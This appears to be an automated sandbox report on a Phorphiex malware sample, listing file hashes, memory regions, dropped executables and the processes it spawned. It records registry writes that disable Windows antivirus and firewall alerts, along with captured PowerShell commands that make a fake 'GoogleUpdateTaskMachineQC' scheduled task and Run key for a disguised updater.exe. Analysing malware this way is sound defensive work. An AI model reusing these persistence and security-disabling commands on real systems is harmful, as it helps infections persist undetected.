| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1532-88-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\394619085.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1532-91-0x000000013FD00000-0x000000013FD06000-memory.dmp
memory/828-93-0x0000000000000000-mapping.dmp
memory/1360-94-0x0000000000000000-mapping.dmp
memory/616-95-0x0000000000000000-mapping.dmp
memory/1108-96-0x0000000000000000-mapping.dmp
C:\Users\Admin\tncmds.dat
| MD5 | e50407aedd7733dd624b0000b557961d |
| SHA1 | e7990c92d876c434a36ef55ae175eade594d0a74 |
| SHA256 | 896ce7dac39bb013ef24d3ad0aa67b7871ee676b0951613f9a0a31686adea34c |
| SHA512 | 307c507312ad447c735624442423552a96a4f9c6b839460b68bf1ef07a14404ca21bc99b5c40597790c9091784e734c7750428a98036a05affbd3b1047469596 |
C:\Users\Admin\tnnodes.dat
| MD5 | 4fa104e9ad7b04d440579ff06af9f698 |
| SHA1 | 5b1b8be4f3092408399a9e11cc2d1ca58b81fcc6 |
| SHA256 | 28e970fce79c5d14035fdf1def7a92cc475e6ec4bf8d950b89d4841ce774bd74 |
| SHA512 | b6c891399c2620d71c94be6ac1f380f875d3ef299d28d53dcad7f8e9ab886caea1908bad7e8ecd632391580a071cd622fbfade8a32249a8c59f75a0de538e3d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZN60M0QQ\2[1]
| MD5 | 65983066e843be01675a7ee2d80e0786 |
| SHA1 | d87ea8b288d8b065ab9550b93fb4a74fea721dad |
| SHA256 | 74769851ee802da9f7fce48c4dfadc1fb55fbdf99affa309b76050cb52c3afac |
| SHA512 | 5d1b1e2d8669f3ed77c458ac82f0ad94197eb4fdb87ee8e62396ef5ed137e25f7484caa3bf694c2c4693b09f7a48c65c4aad15c9be77606c2162c8300c4df511 |
memory/1072-100-0x0000000000000000-mapping.dmp
memory/1072-102-0x000007FEF3800000-0x000007FEF4223000-memory.dmp
memory/1072-104-0x0000000002A24000-0x0000000002A27000-memory.dmp
memory/1072-103-0x000007FEF2CA0000-0x000007FEF37FD000-memory.dmp
memory/1072-105-0x000000001B770000-0x000000001BA6F000-memory.dmp
memory/640-106-0x0000000000000000-mapping.dmp
memory/1072-108-0x0000000002A2B000-0x0000000002A4A000-memory.dmp
memory/1072-107-0x0000000002A24000-0x0000000002A27000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
memory/1228-110-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2d1d7d994e64eeeb2d96f4b256054080 |
| SHA1 | be46ce73a9fb0c4e42971926ee6d3801f51f68a0 |
| SHA256 | 57c931976b782201f1c944b53671b7231798c20b9c40e8269d5eeac318789b7c |
| SHA512 | f0d17f80d2df279b9f7d0d689f0db33b9608bf2d842aac020774302fc3f40a0c47c47334394197fe7df81c04640cc4500db988ecd0e1201d82ec54f86783349f |
memory/1228-113-0x000007FEF2E60000-0x000007FEF3883000-memory.dmp
memory/1228-114-0x000007FEEE5A0000-0x000007FEEF0FD000-memory.dmp
\Users\Admin\AppData\Local\Temp\734023711.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\734023711.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1940-116-0x0000000000000000-mapping.dmp
memory/1228-119-0x0000000002634000-0x0000000002637000-memory.dmp
memory/1648-120-0x0000000000000000-mapping.dmp
memory/1228-121-0x0000000002634000-0x0000000002637000-memory.dmp
memory/1228-122-0x000000000263B000-0x000000000265A000-memory.dmp
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
| MD5 | 37dd19b2be4fa7635ad6a2f3238c4af1 |
| SHA1 | e5b2c034636b434faee84e82e3bce3a3d3561943 |
| SHA256 | 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07 |
| SHA512 | 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-28 09:38
Reported
2022-09-28 09:41
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\85692162.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\625122879.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1125717888.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\85692162.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\85692162.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\85692162.exe
C:\Users\Admin\AppData\Local\Temp\85692162.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\625122879.exe
C:\Users\Admin\AppData\Local\Temp\625122879.exe
C:\Users\Admin\AppData\Local\Temp\1125717888.exe
C:\Users\Admin\AppData\Local\Temp\1125717888.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Network
Files
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
C:\Users\Admin\AppData\Local\Temp\85692162.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\625122879.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\1125717888.exe
| MD5 | f6fd2a4333007f65beef7609077ec14d |
| SHA1 | 3740133e77fae5ee1c0ed1cb0493af5557e3562a |
| SHA256 | b2c7dfbe576c1962cd647917207e957d17dbe367c36dde071054f12beac68499 |
| SHA512 | 43c8b557b1bbfb353d4fe37d09c4dd94c7aaab9d9a6fda421144e40e81e2732df7dbd9faa67ca0e1779e787a8771fbcd9496dee2ae03530462910d1393e513d7 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 00e7da020005370a518c26d5deb40691 |
| SHA1 | 389b34fdb01997f1de74a5a2be0ff656280c0432 |
| SHA256 | a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe |
| SHA512 | 9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d0f3eff52698c0eab8a2c8bd1d9f7c18 |
| SHA1 | 4292ae775443749c6c2281dac800d86b4bdde07e |
| SHA256 | b16c74cbb71b5ba7bbf32696feb6869d9a0fa3bac42042a3fe8f3d48e2d5dbf6 |
| SHA512 | 642b5d51a4cec6094e6789f29eb68885068583a08e102606b7ed2ace036cacd8b3bc428cef6f8cbfaadf5644fe52149211f7fc6774fc4ff458bd76cfae703cfd |
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
| MD5 | d081ded7aeebd495ea24b5531168f315 |
| SHA1 | 21db4bae653ece87474e7121a8b60d9fd08208c9 |
| SHA256 | 6e077c8a35fb28692230158cb9d80104cad9be31c06d64eb091c4cab81669d6a |
| SHA512 | 45dd10bcf9bcd298060ddd6a9e8afc4a938d490db632d9b1ff2c1826975be35009b87d2d7b9a4e2869882aa41dafeb6aba23d8fd4c9d11996b5ffbc8a095c8a0 |